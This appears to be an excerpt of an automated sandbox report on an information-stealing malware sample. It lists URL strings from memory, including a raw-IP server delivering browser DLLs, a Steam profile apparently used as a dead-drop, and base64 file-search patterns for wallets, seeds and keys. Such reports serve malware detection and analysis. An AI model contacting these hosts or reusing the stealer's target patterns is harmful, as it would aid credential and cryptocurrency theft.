                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/S
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/zl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.:
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arp
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpKJJJJKFCGCB3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY2
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpKJJJJKFCGCBm-data;
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.KFCGCB
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.orgGCB
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdablJKFCGCB
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdablJKFCGCB7fc76XQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpultipart/form-data;
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2014471927.0000000002911000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3070815908.00000000000E8000.00000002.00000001.01000000.00000005.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3034260279.00000000027BC000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000000.3082576315.0000000001008000.00000002.00000001.01000000.0000000C.sdmp, SolarSys.pif, 00000026.00000002.3134735771.0000000000408000.00000002.00000001.01000000.0000000E.sdmp, SolarSys.pif, 00000027.00000002.3134290107.0000000000408000.00000002.00000001.01000000.0000000E.sdmp, Bk.pif.17.dr, Univ.0.dr, Effectiveness.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078346010.000000000C8AD000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://65.109.241.221
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/freebl3.dll
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/freebl3.dllN
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/mozglue.dll
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/msvcp140.dll
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/nss3.dll
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/softokn3.dll
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/sqlt.dll
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/sqlt.dllV
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/vcruntime140.dll-
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/vcruntime140.dll2
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221GCA
                    Source: GCFIIE.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                    Source: GCFIIE.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: GCFIIE.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: GCFIIE.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=yK1lsR1Hg7a0&a
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=b0ttg8aG
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=laxk
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=iXlDmMaqrwHh&l=e
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/he
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: https://d.symcb.com/cps0%
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: https://d.symcb.com/rpa0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: https://d.symcb.com/rpa0.
                    Source: GCFIIE.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: GCFIIE.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: GCFIIE.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: HCFBKK.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/P
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199735694209[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199735694209
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/market/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3071880949.000000000149B000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/badges
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/inventory/
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209fr-0Mozilla/5.0
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/
                    Source: 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/about/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/explore/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/legal/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/mobile
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/news/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/points/shop/
